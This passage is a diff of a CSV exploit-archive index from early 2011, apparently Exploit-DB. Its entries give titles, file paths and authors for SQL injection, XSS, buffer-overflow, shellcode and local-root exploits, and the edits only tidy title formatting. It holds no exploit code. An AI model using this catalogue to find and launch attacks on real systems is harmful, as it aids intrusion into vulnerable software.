(gallery.php) SQL Injection",2011-01-02,AtT4CKxT3rR0r1ST,php,webapps,0 15892,platforms/php/webapps/15892.html,"YourTube 1.0 - CSRF Vulnerability (Add User)",2011-01-02,AtT4CKxT3rR0r1ST,php,webapps,0 -15893,platforms/php/webapps/15893.py,"Amoeba CMS 1.01 - Multiple Remote Vulnerabilities",2011-01-02,mr_me,php,webapps,0 +15893,platforms/php/webapps/15893.py,"amoeba cms 1.01 - Multiple Vulnerabilities",2011-01-02,mr_me,php,webapps,0 15894,platforms/windows/dos/15894.c,"MS10-073 Windows Class Handling Vulnerability",2011-01-02,"Tarjei Mandt",windows,dos,0 15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 DEP Bypass",2011-01-02,Blake,windows,local,0 15896,platforms/php/webapps/15896.txt,"Sahana Agasti <= 0.6.4 Multiple Remote File Inclusion",2011-01-03,n0n0x,php,webapps,0 @@ -13788,7 +13786,7 @@ id,file,description,date,author,platform,type,port 15921,platforms/php/webapps/15921.txt,"phpMySport 1.4 Multiple Vulnerabilities (SQLi, Auth Bypass, Path Disclosure)",2011-01-06,"High-Tech Bridge SA",php,webapps,0 15922,platforms/php/webapps/15922.txt,"Phenotype CMS 3.0 SQL Injection",2011-01-06,"High-Tech Bridge SA",php,webapps,0 15923,platforms/php/webapps/15923.txt,"PHP MicroCMS 1.0.1 CSRF and XSS Vulnerabilities",2011-01-06,"High-Tech Bridge SA",php,webapps,0 -15924,platforms/php/webapps/15924.txt,"openSite v0.2.2 beta Local File Inclusion Vulnerbility",2011-01-07,n0n0x,php,webapps,0 +15924,platforms/php/webapps/15924.txt,"openSite 0.2.2 beta - Local File Inclusion Vulnerbility",2011-01-07,n0n0x,php,webapps,0 15925,platforms/windows/dos/15925.txt,"StageTracker 2.5 Denial of Service Vulnerability",2011-01-07,freak_out,windows,dos,0 15934,platforms/windows/local/15934.py,"BS.Player 2.57 Buffer Overflow Exploit (Unicode SEH)",2011-01-07,"C4SS!0 G0M3S",windows,local,0 15935,platforms/linux/dos/15935.c,"GNU libc/regcomp(3) Multiple Vulnerabilities",2011-01-07,"Maksymilian Arciemowicz",linux,dos,0 @@ -13798,10 +13796,10 @@ id,file,description,date,author,platform,type,port 15939,platforms/php/webapps/15939.txt,"Elxis CMS 2009.2 Remote file include vulnerbility",2011-01-08,n0n0x,php,webapps,0 15940,platforms/windows/dos/15940.pl,"HP Data Protector Manager 6.11 - Remote DoS in RDS Service",2011-01-08,Pepelux,windows,dos,0 15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit (SEH)",2011-01-08,fdisk,windows,local,0 -15942,platforms/php/webapps/15942.txt,"Sahana Agasti <= 0.6.5 Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0 -15943,platforms/php/webapps/15943.txt,"Mingle Forum (WordPress Plugin) <= 1.0.26 Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0 +15942,platforms/php/webapps/15942.txt,"sahana agasti <= 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0 +15943,platforms/php/webapps/15943.txt,"mingle forum (wordpress plugin) <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0 15944,platforms/linux/local/15944.c,"Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)",2011-01-08,"Joe Sylve",linux,local,0 -15945,platforms/php/webapps/15945.txt,"Zwii v 2.1.1 Remote File Inclusion Vulnerbility",2011-01-08,"Abdi Mohamed",php,webapps,0 +15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion Vulnerbility",2011-01-08,"Abdi Mohamed",php,webapps,0 15946,platforms/windows/dos/15946.py,"IrfanView 4.28 Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0 15957,platforms/windows/remote/15957.py,"KingView 6.5.3 SCADA HMI Heap Overflow PoC",2011-01-09,"Dillon Beresford ",windows,remote,0 15958,platforms/php/webapps/15958.txt,"Joomla Captcha Plugin <= 4.5.1 Local File Disclosure Vulnerability",2011-01-09,dun,php,webapps,0 @@ -13812,9 +13810,9 @@ id,file,description,date,author,platform,type,port 15963,platforms/windows/remote/15963.rb,"MS10-081: Windows Common Control Library (Comctl32) Heap Overflow",2011-01-10,"Nephi Johnson",windows,remote,0 15964,platforms/php/webapps/15964.py,"Lotus CMS Fraise 3.0 - LFI - Remote Code Execution Exploit",2011-01-10,mr_me,php,webapps,0 15966,platforms/php/webapps/15966.txt,"ExtCalendar 2 (calendar.php) SQL Injection Vulnerability",2011-01-11,"Lagripe-Dz and Mca-Crb",php,webapps,0 -15967,platforms/php/webapps/15967.txt,"Energine 2.3.8 Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 -15968,platforms/php/webapps/15968.txt,"VaM Shop 1.6 Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 -15969,platforms/php/webapps/15969.txt,"diafan.CMS 4.3 Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 +15967,platforms/php/webapps/15967.txt,"energine 2.3.8 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 +15968,platforms/php/webapps/15968.txt,"vam shop 1.6 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 +15969,platforms/php/webapps/15969.txt,"diafan.cms 4.3 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15970,platforms/php/webapps/15970.txt,"Cambio 0.5a CSRF Vulnerabiliity",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15971,platforms/php/webapps/15971.txt,"whCMS 0.115 CSRF Vulnerability",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15972,platforms/windows/local/15972.c,"DriveCrypt <= 5.3 Local Kernel ring0 SYSTEM Exploit",2011-01-11,mu-b,windows,local,0 @@ -13833,8 +13831,8 @@ id,file,description,date,author,platform,type,port 15992,platforms/windows/dos/15992.txt,"Sielco Sistemi Winlog <= 2.07.00 Stack Overflow",2011-01-14,"Luigi Auriemma",windows,dos,0 15993,platforms/php/webapps/15993.html,"viart shop 4.0.5 - CSRF Vulnerability",2011-01-15,Or4nG.M4N,php,webapps,0 15994,platforms/windows/local/15994.rb,"eXtremeMP3 Player Buffer Overflow (SEH)",2011-01-15,"C4SS!0 G0M3S",windows,local,0 -15995,platforms/php/webapps/15995.txt,"glFusion CMS 1.2.1 Stored XSS via img Tag",2011-01-15,Saif,php,webapps,0 -15996,platforms/php/webapps/15996.txt,"CompactCMS 1.4.1 Multiple Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0 +15995,platforms/php/webapps/15995.txt,"glfusion cms 1.2.1 - Stored XSS via img tag",2011-01-15,Saif,php,webapps,0 +15996,platforms/php/webapps/15996.txt,"compactcms 1.4.1 - Multiple Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0 15997,platforms/jsp/webapps/15997.py,"MeshCMS 3.5 - Remote Code Execution Exploit",2011-01-16,mr_me,jsp,webapps,0 15998,platforms/windows/dos/15998.txt,"Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 Local Kernel Mode DoS Exploit",2011-01-16,MJ0011,windows,dos,0 15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 (bid) Blind SQL Injection Vulnerability",2011-01-16,"BorN To K!LL",php,webapps,0 @@ -13843,10 +13841,10 @@ id,file,description,date,author,platform,type,port 16002,platforms/windows/dos/16002.html,"ActiveX UserManager 2.03 Buffer Overflow",2011-01-16,Blake,windows,dos,0 16003,platforms/php/webapps/16003.txt,"AWBS 2.9.2 (cart.php) Blind SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0 16004,platforms/php/webapps/16004.txt,"PHP-Fusion Teams Structure Infusion Addon SQL Injection",2011-01-17,Saif,php,webapps,0 -16006,platforms/cgi/webapps/16006.html,"SmoothWall Express 3.0 Multiple Vulnerabilities",2011-01-17,"dave b",cgi,webapps,0 +16006,platforms/cgi/webapps/16006.html,"SmoothWall Express 3.0 - Multiple Vulnerabilities",2011-01-17,"dave b",cgi,webapps,0 16007,platforms/php/webapps/16007.txt,"AneCMS 1.3 Persistant XSS Vulnerability",2011-01-17,Penguin,php,webapps,0 16009,platforms/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 (.wav) Buffer Overflow Exploit",2011-01-18,h1ch4m,windows,local,0 -16010,platforms/php/webapps/16010.txt,"allCineVid Joomla Component 1.0.0 Blind SQL Injection Vulnerability",2011-01-18,"Salvatore Fresta",php,webapps,0 +16010,platforms/php/webapps/16010.txt,"allCineVid Joomla Component 1.0.0 - Blind SQL Injection Vulnerability",2011-01-18,"Salvatore Fresta",php,webapps,0 16011,platforms/php/webapps/16011.txt,"CakePHP <= 1.3.5 / 1.2.8 unserialize() Vulnerability",2011-01-18,felix,php,webapps,0 16012,platforms/windows/dos/16012.html,"Google Chrome 8.0.552.237 - address overflow DoS",2011-01-18,"Vuk Ivanovic",windows,dos,0 16013,platforms/php/webapps/16013.html,"N-13 News 3.4 Remote Admin Add CSRF Exploit",2011-01-18,anT!-Tr0J4n,php,webapps,0 @@ -13862,7 +13860,7 @@ id,file,description,date,author,platform,type,port 16025,platforms/bsd_x86/shellcode/16025.c,"BSD x86 connect back Shellcode (81 bytes)",2011-01-21,Tosh,bsd_x86,shellcode,0 16026,platforms/bsd_x86/shellcode/16026.c,"BSD x86 portbind + fork shellcode (111 bytes)",2011-01-21,Tosh,bsd_x86,shellcode,0 16027,platforms/php/webapps/16027.txt,"phpcms 9.0 - Blind SQL Injection Vulnerability",2011-01-22,eidelweiss,php,webapps,0 -16028,platforms/php/webapps/16028.txt,"CultBooking 2.0.4 Multiple Vulnerabilities",2011-01-22,LiquidWorm,php,webapps,0 +16028,platforms/php/webapps/16028.txt,"cultbooking 2.0.4 - Multiple Vulnerabilities",2011-01-22,LiquidWorm,php,webapps,0 16034,platforms/php/webapps/16034.txt,"PHP Coupon Script v. 6.0 (bus) Blind SQL Injection Vulnerability",2011-01-23,"BorN To K!LL",php,webapps,0 16035,platforms/windows/dos/16035.py,"Inetserv 3.23 SMTP Denial of Service Vulnerability",2011-01-23,G13,windows,dos,0 16036,platforms/windows/remote/16036.rb,"Golden FTP Server 4.70 - PASS Command Buffer Overflow Exploit",2011-01-23,"cd1zz and iglesiasgg",windows,remote,0 @@ -13872,19 +13870,19 @@ id,file,description,date,author,platform,type,port 16040,platforms/windows/dos/16040.py,"Automated Solutions Modbus/TCP OPC Server Remote Heap Corruption PoC",2011-01-25,"Jeremy Brown",windows,dos,0 16041,platforms/multiple/remote/16041.txt,"Sun Microsystems SunScreen Firewall Root Exploit",2011-01-25,Kingcope,multiple,remote,0 16042,platforms/windows/dos/16042.rb,"Opera Web Browser 11.00 Integer Overflow Vulnerability",2011-01-25,"C4SS!0 G0M3S",windows,dos,0 -16044,platforms/php/webapps/16044.txt,"AB WEB CMS 1.35 - Multiple Remote Vulnerabilities",2011-01-25,"Dr.0rYX and Cr3w-DZ",php,webapps,0 +16044,platforms/php/webapps/16044.txt,"ab web cms 1.35 - Multiple Vulnerabilities",2011-01-25,"Dr.0rYX and Cr3w-DZ",php,webapps,0 16047,platforms/php/webapps/16047.txt,"PHPDirector Game Edition (game.php) SQL Injection Vulnerability",2011-01-26,AtT4CKxT3rR0r1ST,php,webapps,0 16049,platforms/php/webapps/16049.txt,"AWCM 2.2 final - Local File Inclusion Vulnerability",2011-01-26,Cucura,php,webapps,0 -16050,platforms/php/webapps/16050.txt,"class.upload.php v 0.30 Remote File Upload Vulnerability",2011-01-26,DIES3L,php,webapps,0 -16051,platforms/php/webapps/16051.txt,"Froxlor v 0.9.15 Remote File Inclusion Vulnerbility",2011-01-26,DIES3L,php,webapps,0 +16050,platforms/php/webapps/16050.txt,"class.upload.php 0.30 - Remote File Upload Vulnerability",2011-01-26,DIES3L,php,webapps,0 +16051,platforms/php/webapps/16051.txt,"Froxlor 0.9.15 - Remote File Inclusion Vulnerbility",2011-01-26,DIES3L,php,webapps,0 16052,platforms/windows/remote/16052.txt,"Oracle Document Capture 10.1.3.5 Insecure Method / Buffer Overflow",2011-01-26,"Alexandr Polyakov",windows,remote,0 16053,platforms/windows/remote/16053.txt,"Oracle Document Capture Actbar2.ocx Insecure Method",2011-01-26,"Evdokimov Dmitriy",windows,remote,0 -16054,platforms/windows/webapps/16054.txt,"SAP Crystal Report Server 2008 Directory Traversal",2011-01-26,"Dmitriy Chastuhin",windows,webapps,0 +16054,platforms/windows/webapps/16054.txt,"sap crystal report server 2008 - Directory Traversal",2011-01-26,"Dmitriy Chastuhin",windows,webapps,0 16055,platforms/windows/remote/16055.txt,"Oracle Document Capture empop3.dll Insecure Methods",2011-01-26,"Evdokimov Dmitriy",windows,remote,0 16056,platforms/windows/remote/16056.txt,"Oracle Document Capture Insecure READ Method",2011-01-26,"Alexey Sintsov",windows,remote,0 -16058,platforms/php/webapps/16058.txt,"MultiPowUpload v 2.1 Remote File Upload Vulnerability",2011-01-26,DIES3L,php,webapps,0 +16058,platforms/php/webapps/16058.txt,"MultiPowUpload 2.1 - Remote File Upload Vulnerability",2011-01-26,DIES3L,php,webapps,0 16059,platforms/php/webapps/16059.txt,"Xnova Legacies 2009.2 CSRF Vulnerability",2011-01-26,"Xploit A Day",php,webapps,0 -16060,platforms/php/webapps/16060.txt,"ComercioPlus 5.6 Multiple Vulnerabilities",2011-01-27,"Daniel Godoy",php,webapps,0 +16060,platforms/php/webapps/16060.txt,"comercioplus 5.6 - Multiple Vulnerabilities",2011-01-27,"Daniel Godoy",php,webapps,0 16061,platforms/php/webapps/16061.txt,"PHP Link Directory Software (sbcat_id) SQL Injection Vulnerability",2011-01-28,"BorN To K!LL",php,webapps,0 16062,platforms/php/webapps/16062.txt,"PHP Classified ads software (cid) Blind SQL Injection Vulnerability",2011-01-28,"BorN To K!LL",php,webapps,0 16064,platforms/bsd/dos/16064.c,"FreeBSD 8.0 Local Denial of Service (forced reboot)",2011-01-28,Kingcope,bsd,dos,0 @@ -13895,7 +13893,7 @@ id,file,description,date,author,platform,type,port 16072,platforms/windows/local/16072.py,"WM Downloader 3.1.2.2 2010.04.15 (.m3u) Buffer Overflow + DEP Bypass",2011-01-29,sickness,windows,local,0 16073,platforms/windows/local/16073.pl,"A-PDF All to MP3 Converter 2.0.0 (.wav) Buffer Overflow (seh)",2011-01-29,m0nna,windows,local,0 16074,platforms/php/webapps/16074.txt,"MultiCMS Local File Inclusion Vulnerbility",2011-01-29,R3VAN_BASTARD,php,webapps,0 -16075,platforms/windows/remote/16075.pl,"Caedo HTTPd Server v 0.5.1 ALPHA Remote File Download",2011-01-29,"Zer0 Thunder",windows,remote,0 +16075,platforms/windows/remote/16075.pl,"Caedo HTTPd Server 0.5.1 ALPHA - Remote File Download",2011-01-29,"Zer0 Thunder",windows,remote,0 16076,platforms/php/webapps/16076.txt,"vBSEO 3.5.2 & 3.2.2 - Persistent XSS via LinkBacks",2011-01-30,MaXe,php,webapps,0 16077,platforms/php/webapps/16077.txt,"vBSEO Sitemap 2.5 & 3.0 - Multiple Vulnerabilities",2011-01-30,MaXe,php,webapps,0 16078,platforms/windows/remote/16078.py,"SDP Downloader 2.3.0 (http_response) Remote Buffer Overflow Exploit",2011-01-30,sup3r,windows,remote,0 @@ -13907,12 +13905,12 @@ id,file,description,date,author,platform,type,port 16086,platforms/linux/local/16086.txt,"OpenVAS Manager Command Injection Vulnerability",2011-01-31,"Tim Brown",linux,local,0 16087,platforms/php/webapps/16087.txt,"PMB Services <= 3.4.3 SQL Injection Vunerability",2011-02-01,Luchador,php,webapps,0 16088,platforms/php/webapps/16088.php,"NetLink Arbitrary File Upload Vulnerability",2011-02-01,lumut--,php,webapps,0 -16090,platforms/php/webapps/16090.txt,"TinyWebGallery v 1.8.3 - Multiple Vulnerabilities",2011-02-01,"Yam Mesicka",php,webapps,0 +16090,platforms/php/webapps/16090.txt,"TinyWebGallery 1.8.3 - Multiple Vulnerabilities",2011-02-01,"Yam Mesicka",php,webapps,0 16091,platforms/php/webapps/16091.txt,"Joomla! 1.5 & 1.6 - JFilterInput XSS Bypass",2011-02-01,"Jeff Channell",php,webapps,0 16092,platforms/windows/local/16092.py,"CodeBlocks 8.02 - (cbp) Buffer Overflow Exploit",2011-02-01,sup3r,windows,local,0 16094,platforms/php/webapps/16094.txt,"Raja Natarajan Guestbook 1.0 Local File Inclusion Vulnerability",2011-02-02,h0rd,php,webapps,0 16095,platforms/linux/dos/16095.pl,"Terminal Server Client .rdp Denial of Service",2011-02-02,"D3V!L FUCKER",linux,dos,0 -16096,platforms/php/webapps/16096.txt,"Redaxscript 0.3.2 Multiple Vulnerabilities",2011-02-02,"High-Tech Bridge SA",php,webapps,0 +16096,platforms/php/webapps/16096.txt,"redaxscript 0.3.2 - Multiple Vulnerabilities",2011-02-02,"High-Tech Bridge SA",php,webapps,0 16097,platforms/php/webapps/16097.txt,"Zikula CMS <= 1.2.4 CSRF Vulnerability",2011-02-02,"Aung Khant",php,webapps,0 16098,platforms/hardware/local/16098.c,"Android 1.x/2.x HTC Wildfire Local Root Exploit",2011-02-02,"The Android Exploid Crew",hardware,local,0 16099,platforms/hardware/local/16099.c,"Android 1.x/2.x Local Root Exploit",2011-02-02,"The Android Exploid Crew",hardware,local,0 @@ -13920,23 +13918,23 @@ id,file,description,date,author,platform,type,port 16101,platforms/windows/remote/16101.py,"FTPGetter 3.58.0.21 - Buffer Overflow (PASV) Exploit",2011-02-03,modpr0be,windows,remote,0 16102,platforms/php/webapps/16102.txt,"Islam Sound IV2 - (details.php) Remote SQL Injection",2011-02-03,ZxH-Labs,php,webapps,0 16103,platforms/multiple/remote/16103.txt,"Majordomo2 - Directory Traversal (SMTP/HTTP)",2011-02-03,"Michael Brooks",multiple,remote,0 -16105,platforms/windows/remote/16105.txt,"QuickShare File Share 1.2.1 Directory Traversal Vulnerability",2011-02-03,modpr0be,windows,remote,0 +16105,platforms/windows/remote/16105.txt,"quickshare file share 1.2.1 - Directory Traversal vulnerability",2011-02-03,modpr0be,windows,remote,0 16106,platforms/php/webapps/16106.txt,"OemPro 3.6.4 - Multiple Vulnerabilities",2011-02-03,"Ignacio Garrido",php,webapps,0 16107,platforms/windows/local/16107.py,"AOL Desktop 9.6 .rtx Buffer Overflow",2011-02-03,sickness,windows,local,0 16108,platforms/multiple/dos/16108.txt,"VLC Media Player Subtitle StripTags() Function Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos,0 -16109,platforms/php/webapps/16109.txt,"Podcast Generator 1.3 Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",php,webapps,0 -16110,platforms/php/webapps/16110.txt,"ReOS 2.0.5 Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",php,webapps,0 +16109,platforms/php/webapps/16109.txt,"podcast generator 1.3 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",php,webapps,0 +16110,platforms/php/webapps/16110.txt,"reos 2.0.5 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",php,webapps,0 16113,platforms/php/webapps/16113.txt,"oscommerce authentication bypass",2011-02-04,"Nicolas Krassas",php,webapps,0 16114,platforms/php/webapps/16114.txt,"Chamilo 1.8.7 / Dokeos 1.8.6 Remote File Disclosure",2011-02-05,beford,php,webapps,0 16116,platforms/php/webapps/16116.txt,"Qcodo Development Framework 0.3.3 Full Info Disclosure",2011-02-05,"Daniel Godoy",php,webapps,0 16117,platforms/php/webapps/16117.txt,"Escort und Begleitservice Agentur Script SQL Injection Vunerability",2011-02-05,NoNameMT,php,webapps,0 -16119,platforms/freebsd/local/16119.c,"FreeBSD <= 5.4-RELEASE ftpd (Version 6.00LS) - sendfile kernel mem-leak Exploit",2011-02-06,Kingcope,freebsd,local,0 +16119,platforms/freebsd/local/16119.c,"FreeBSD <= 5.4-RELEASE ftpd 6.00LS - sendfile kernel mem-leak Exploit",2011-02-06,Kingcope,freebsd,local,0 16120,platforms/windows/dos/16120.py,"Hanso Player 1.4.0.0 Buffer Overflow - DoS Skinfile",2011-02-06,badc0re,windows,dos,0 16121,platforms/windows/dos/16121.py,"Hanso Converter 1.1.0 - BufferOverflow Denial of Service",2011-02-06,badc0re,windows,dos,0 16122,platforms/php/webapps/16122.txt,"Dew-NewPHPLinks 2.1b (index.php) - SQL Injection Vulnerability",2011-02-06,AtT4CKxT3rR0r1ST,php,webapps,0 16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0 16127,platforms/php/webapps/16127.txt,"T-Content Managment System Multiple Vulnerabilities",2011-02-07,"Daniel Godoy",php,webapps,0 -16128,platforms/php/webapps/16128.txt,"JAKCMS 2.0 PRO RC5 stored XSS via useragent HTTP header Injection",2011-02-07,"Saif El-Sherei",php,webapps,0 +16128,platforms/php/webapps/16128.txt,"jakcms 2.0 pro rc5 - Stored XSS via useragent http header injection",2011-02-07,"Saif El-Sherei",php,webapps,0 16129,platforms/linux/dos/16129.txt,"ProFTPD mod_sftp Integer Overflow DoS PoC",2011-02-07,Kingcope,linux,dos,0 16130,platforms/php/webapps/16130.txt,"MyMarket 1.71 (index.php) SQL Injection Vulnerability",2011-02-07,ahmadso,php,webapps,0 16131,platforms/php/webapps/16131.txt,"SWFUpload 2.5.0 Beta 3 - File Arbitrary Upload",2011-02-07,"Daniel Godoy",php,webapps,0 @@ -13962,18 +13960,18 @@ id,file,description,date,author,platform,type,port 16155,platforms/php/webapps/16155.txt,"Geomi CMS SQL Injection Vulnerability",2011-02-11,"ThunDEr HeaD",php,webapps,0 16156,platforms/php/webapps/16156.txt,"Kunena < 1.5.13, < 1.6.3 SQL Injection Vulnerability",2011-02-11,"Red Matter",php,webapps,0 16157,platforms/jsp/webapps/16157.py,"Openedit <= 5.1294 - Remote Code Execution Exploit",2011-02-11,mr_me,jsp,webapps,0 -16158,platforms/php/webapps/16158.txt,"TaskFreak! v0.6.4 Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,php,webapps,0 +16158,platforms/php/webapps/16158.txt,"TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,php,webapps,0 16159,platforms/php/webapps/16159.txt,"Escort Agency CMS Blind SQL Injection Vunerability",2011-02-12,NoNameMT,php,webapps,0 16160,platforms/php/webapps/16160.txt,"Pixelpost 1.7.3 Multiple POST Variables SQL Injection Vulnerability",2011-02-12,LiquidWorm,php,webapps,0 16162,platforms/windows/local/16162.pl,"CuteZip 2.1 Buffer Overflow Exploit",2011-02-12,"C4SS!0 G0M3S",windows,local,0 16165,platforms/php/webapps/16165.txt,"AWCM 2.2 final - Persistent Cross Site Script Vulnerability",2011-02-14,_84kur10_,php,webapps,0 16166,platforms/windows/dos/16166.py,"MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0 16167,platforms/php/webapps/16167.txt,"jSchool Advanced SQL Injection Vulnerability",2011-02-14,eXa.DisC,php,webapps,0 -16168,platforms/php/webapps/16168.txt,"RunCMS 2.2.2 Multiple Vulnerabilities",2011-02-14,"High-Tech Bridge SA",php,webapps,0 +16168,platforms/php/webapps/16168.txt,"runcms 2.2.2 - Multiple Vulnerabilities",2011-02-14,"High-Tech Bridge SA",php,webapps,0 16169,platforms/windows/local/16169.py,"Oracle 10/11g exp.exe - param file Local Buffer Overflow PoC Exploit",2011-02-15,mr_me,windows,local,0 16170,platforms/php/webapps/16170.txt,"phpMyBitTorrent 2.0.4 SQL Injection Vulnerability",2011-02-15,#forkbombers,php,webapps,0 16171,platforms/cfm/webapps/16171.py,"Lingxia I.C.E CMS Remote Blind SQL Injection Exploit",2011-02-15,mr_me,cfm,webapps,0 -16172,platforms/php/webapps/16172.txt,"OmegaBill 1.0 Build 6 Multiple Vulnerabilities",2011-02-15,"AutoSec Tools",php,webapps,0 +16172,platforms/php/webapps/16172.txt,"omegabill 1.0 build 6 - Multiple Vulnerabilities",2011-02-15,"AutoSec Tools",php,webapps,0 16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow Exploit (SEH)",2011-02-15,badc0re,windows,local,0 16175,platforms/php/webapps/16175.txt,"Seo Panel 2.2.0 SQL Injection Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 16176,platforms/windows/remote/16176.pl,"ActFax Server (LPD/LPR) Remote Buffer Overflow Exploit",2011-02-16,chap0,windows,remote,0 @@ -13988,7 +13986,7 @@ id,file,description,date,author,platform,type,port 16191,platforms/windows/dos/16191.pl,"Novell ZenWorks 10 & 11 TFTPD Remote Code Execution Vulnerability",2011-02-18,"Francis Provencher",windows,dos,0 16192,platforms/linux/dos/16192.pl,"Novell Iprint LPD Remote Code Execution Vulnerability",2011-02-18,"Francis Provencher",linux,dos,0 16193,platforms/windows/dos/16193.pl,"Avira AntiVir QUA file in (avcenter.exe) Local Crash PoC",2011-02-19,KedAns-Dz,windows,dos,0 -16196,platforms/php/webapps/16196.txt,"Eventum Issue Tracking System 2.3.1 stored XSS",2011-02-19,"Saif El-Sherei",php,webapps,0 +16196,platforms/php/webapps/16196.txt,"eventum issue tracking system 2.3.1 - Stored XSS",2011-02-19,"Saif El-Sherei",php,webapps,0 16197,platforms/php/webapps/16197.txt,"Escort Directory CMS SQL Injection Vunerability",2011-02-19,NoNameMT,php,webapps,0 16198,platforms/php/webapps/16198.txt,"Independent Escort CMS Blind SQL Injection Vunerability",2011-02-19,NoNameMT,php,webapps,0 16199,platforms/php/webapps/16199.txt,"Icy Phoenix 1.3.0.53a HTTP Referer stored XSS",2011-02-20,"Saif El-Sherei",php,webapps,0 @@ -13999,7 +13997,7 @@ id,file,description,date,author,platform,type,port 16204,platforms/windows/dos/16204.pl,"Solar FTP 2.1 Denial of Service Exploit",2011-02-22,x000,windows,dos,0 16205,platforms/asp/webapps/16205.txt,"DIY Web CMS Multiple Vulnerabilities",2011-02-22,p0pc0rn,asp,webapps,0 16206,platforms/php/webapps/16206.txt,"Galilery 1.0 Local File Inclusion Vulnerability",2011-02-22,lemlajt,php,webapps,0 -16207,platforms/php/webapps/16207.txt,"Dotproject 2.1.5 Multiple Vulnerabilities",2011-02-22,lemlajt,php,webapps,0 +16207,platforms/php/webapps/16207.txt,"dotproject 2.1.5 - Multiple Vulnerabilities",2011-02-22,lemlajt,php,webapps,0 16208,platforms/hardware/remote/16208.txt,"iOS FtpDisc 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 16209,platforms/hardware/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 16213,platforms/php/webapps/16213.txt,"Hyena Cart (index.php) SQL Injection Vulnerability",2011-02-23,AtT4CKxT3rR0r1ST,php,webapps,0 @@ -14009,7 +14007,7 @@ id,file,description,date,author,platform,type,port 16218,platforms/php/webapps/16218.txt,"Z-Vote 1.1 Wordpress Plugin SQL Injection Vulnerability",2011-02-23,"High-Tech Bridge SA",php,webapps,0 16220,platforms/php/webapps/16220.py,"ProQuiz 2.0.0b Arbitrary Upload Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0 16221,platforms/php/webapps/16221.txt,"Comment Rating 2.9.23 Wordpress Plugin Multiple Vulnerabilities",2011-02-23,"High-Tech Bridge SA",php,webapps,0 -16222,platforms/php/webapps/16222.txt,"Course Registration Management System 2.1 Multiple Vulnerabilities",2011-02-23,"AutoSec Tools",php,webapps,0 +16222,platforms/php/webapps/16222.txt,"course registration management system 2.1 - Multiple Vulnerabilities",2011-02-23,"AutoSec Tools",php,webapps,0 16223,platforms/php/webapps/16223.txt,"VidiScript SQL Injection Vulnerability",2011-02-23,ThEtA.Nu,php,webapps,0 16225,platforms/cfm/webapps/16225.txt,"Alcassoft's SOPHIA CMS SQL Injection Vulnerability",2011-02-24,p0pc0rn,cfm,webapps,0 16226,platforms/hardware/remote/16226.txt,"iSO Air Files 2.6 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 @@ -14021,21 +14019,21 @@ id,file,description,date,author,platform,type,port 16232,platforms/php/webapps/16232.txt,"GigPress 2.1.10 Wordpress Plugin Stored XSS Vulnerability",2011-02-24,"Saif El-Sherei",php,webapps,0 16233,platforms/php/webapps/16233.txt,"Relevanssi 2.7.2 Wordpress Plugin Stored XSS Vulnerability",2011-02-24,"Saif El-Sherei",php,webapps,0 16234,platforms/netware/dos/16234.rb,"Novell Netware RPC XNFS xdrDecodeString Vulnerability",2011-02-24,"Francis Provencher",netware,dos,0 -16235,platforms/php/webapps/16235.txt,"WP Forum Server 1.6.5 Wordpress Plugin SQL Injection Vulnerability",2011-02-24,"High-Tech Bridge SA",php,webapps,0 +16235,platforms/php/webapps/16235.txt,"Wordpress Plugin Forum Server 1.6.5 - SQL Injection Vulnerability",2011-02-24,"High-Tech Bridge SA",php,webapps,0 16236,platforms/php/webapps/16236.txt,"IWantOneButton 3.0.1 Wordpress Plugin Multiple Vulnerabilities",2011-02-24,"High-Tech Bridge SA",php,webapps,0 16237,platforms/windows/dos/16237.py,"Elecard MPEG Player 5.7 Local Buffer Overflow PoC (SEH)",2011-02-24,badc0re,windows,dos,0 -16238,platforms/hardware/remote/16238.txt,"iPhone ishred 1.93 Directory Traversal",2011-02-24,IRCRASH,hardware,remote,0 +16238,platforms/hardware/remote/16238.txt,"iphone ishred 1.93 